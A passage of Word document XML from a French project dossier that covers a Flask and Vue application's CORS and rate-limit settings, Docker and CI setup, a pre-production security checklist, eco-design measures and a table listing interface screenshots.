        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>global. Ce motif permet d'instancier une application de test avec une configuration distincte, sans toucher au code de production — prérequis du plan de tests (§ 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3996277" cy="1789916"/>
            <wp:docPr id="37" name="Picture 37"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="a18fb70be70f-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3996277" cy="1789916"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux détails comptent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">origins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">est une liste explicite, jamais</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Avec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">supports_credentials=True</w:t>
      </w:r>
      <w:r>
        <w:t>, un joker serait d'ailleurs refusé par les navigateurs — mais l'intention est d'abord de restreindre : seule l'origine du front peut envoyer des requêtes authentifiées. L'origine est lue dans CORS_ORIGINS, dont la valeur par défaut est celle du développement ; elle doit être renseignée avec le domaine réel au déploiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le gestionnaire d'erreur 429 normalise la réponse.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sans lui, Flask-Limiter renvoie une page HTML, qu'un client attendant du JSON ne sait pas interpréter. Le message reste volontairement vague — « Trop de tentatives » — sans préciser le nombre de tentatives restantes ni la durée exacte du blocage, informations qui aideraient un attaquant à calibrer son rythme.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:id="88" w:name="X90241217d1214105eb16794945610287ef6564e"/>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="89" w:name="Xd1095e60733dbbf5c9c8b2c195c2b19f7df47a2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Déploiement et industrialisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>La conteneurisation et l'intégration continue sont en place depuis le 4 octobre ; seul le déploiement proprement dit reste à faire (§ 4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Conteneurisation. Trois services dans docker-compose.yml : MySQL 8.4 avec un volume persistant et une sonde de santé, le backend (image Python, Gunicorn à la place du serveur de développement Flask, utilisateur non privilégié), et le frontend (construction Vite en deux étapes puis service des fichiers statiques par Nginx, image finale d'environ 50 Mo, repli monopage). Ollama reste hors composition, sur l'hôte, atteint par host.docker.internal : son image pèse plusieurs gigaoctets et le modèle se télécharge à part. Les secrets sont déclarés sous la forme ${VAR:?message} — la composition échoue immédiatement si la variable manque, au lieu de démarrer avec une valeur inventée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Intégration continue. Le flux GitHub Actions (.github/workflows/ci.yml) se déclenche sur chaque push et chaque pull request, et s'organise en trois travaux parallèles : backend (Ruff en analyse et en format, puis pytest avec des clés éphémères générées pour la durée du travail), frontend (ESLint, Prettier, vérification des types par vue-tsc, Vitest, build de production), et Docker (validation de la composition puis construction des deux images). Le parallélisme n'est pas un détail de performance : avec des travaux enchaînés, un échec du frontend masquait l'état du backend, et il fallait deux exécutions pour connaître les deux. L'installation des dépendances frontend passe par npm ci --ignore-scripts : la première partie installe exactement ce que décrit package-lock.json, la seconde empêche les scripts de cycle de vie npm d'exécuter du code arbitraire — la leçon directe de l'incident axios (§ 11).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Reste à ajouter au pipeline : l'audit des dépendances (npm audit, pip-audit) et un seuil de couverture sur le travail backend. Les deux outils sont déjà installés et exécutés manuellement ; il manque l'étape qui les rend bloquants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Liste de contrôle avant mise en production.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Les points suivants sont des changements de configuration, pas de code, et c'est précisément pourquoi ils s'oublient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Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">APP_ENV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Passer à</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">production</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— active</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">sur le cookie de refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Générer une clé distincte de celle de développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Origine CORS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Renseigner CORS_ORIGINS avec le domaine réel — la valeur n'est plus codée en dur depuis la conteneurisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Base de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exécuter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">schema_mysql.sql</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">avec un compte administrateur, puis faire tourner l'application avec un compte aux droits limités (SELECT, INSERT, UPDATE, DELETE — jamais DDL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remplacer la sandbox Mailtrap par un fournisseur réel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serveur d'application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gunicorn,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">debug=False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminaison TLS devant l'application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moteur d'inférence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Vérifier la version d'Ollama (≥ 0.18 ; 0.35.1 installée) et son écoute sur l'interface de bouclage uniquement — OLLAMA_HOST=127.0.0.1:11434 (§ 11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SameSite=Strict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SameSite raisonne en sites (eTLD+1), pas en origines. En développement, front (:5173) et API (:5000) sont tous deux sur localhost : même site, le cookie passe. En production, prévoir deux sous-domaines d'un même domaine, ou l'API derrière un reverse proxy sur le domaine du front — deux domaines distincts casseraient le refresh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Flask-Limiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Remplacer le stockage en mémoire par Redis : les seuils comptent par worker, et gunicorn en lance plusieurs — avec 2 workers, le seuil de /auth/login est doublé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="109" w:name="X97e138c7ef77c1288f2ca7d6a6a71d1db0c4afd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Éco-conception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le cahier des charges demande un chargement différé, des dépendances optimisées et une compression GZIP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">chargement différé</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est en place : chaque route du routeur importe sa vue par une fonction —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">component: () =&gt; import("./views/HomeView.vue")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— ce qui produit un fragment distinct par écran. Un visiteur qui consulte la page d'accueil ne télécharge ni l'éditeur CodeMirror ni le back-office.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">poids des dépendances</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est contenu par le refus des bibliothèques d'usage unique : neuf paquets côté backend, et côté frontend aucune bibliothèque de composants lourde. CodeMirror est importé par modules séparés plutôt qu'en bloc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Le poids du CSS a été réduit par une mesure plutôt que par une impression. daisyUI a été retiré : 45,6 Ko pour cinq classes réellement utilisées. Les feuilles de style passent de 79,9 à 34,4 Ko bruts, soit 57 % de moins, et de 13,7 à 7,0 Ko une fois compressées. Le menu mobile, seule mécanique qui en dépendait, est désormais piloté par l'état du composant — ce qui lui apporte au passage aria-expanded, la fermeture par Échap et la fermeture au clic extérieur. Retirer une bibliothèque de composants a donc amélioré l'accessibilité en même temps que le poids, ce qui n'était pas l'objectif visé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>La compression GZIP relève du serveur de fichiers statiques et est configurée dans l'image Nginx du frontend. Un point reste ouvert : le paquet JavaScript dépasse 500 Ko et vite build le signale à chaque construction. Le découpage en morceaux est à envisager — CodeMirror et le back-office sont les deux candidats évidents, puisqu'un visiteur de la page d'accueil n'a besoin ni de l'un ni de l'autre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A6F0C" w14:textId="027F9FB2" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00F02D2D" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>es réalisations du candidat comportant les extraits de code les plus significatifs, les arguments qui ont conduit à ses choix, y compris pour la sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B314B3" w14:textId="0BCD997D" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc198828317"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>es captures d’écran d’interfaces utilisateur et le code correspondant</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Huit captures ont été réalisées sur l'application en fonctionnement, avec un compte de démonstration. Elles figurent intégralement en annexe § 12.2 ; cette section présente les deux écrans les plus significatifs et le code qui les produit.</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Écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Planche correspondante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-01</w:t>
            </w:r>
          </w:p>
        </w:tc>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W-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-01b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accueil — vue mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-03</w:t>
            </w:r>
          </w:p>
        </w:tc>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W-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe oublié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/forgot-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-05</w:t>
            </w:r>
          </w:p>
        </w:tc>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W-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-06</w:t>
            </w:r>
          </w:p>
        </w:tc>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W-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nouveau document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/nouveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="91" w:name="X6eda1e79cee1ee905822ddb228e7d698a73d2d2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Le tableau de bord (capture C-05)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3780000" cy="3958259"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-05-tableau-de-bord.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3780000" cy="3958259"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
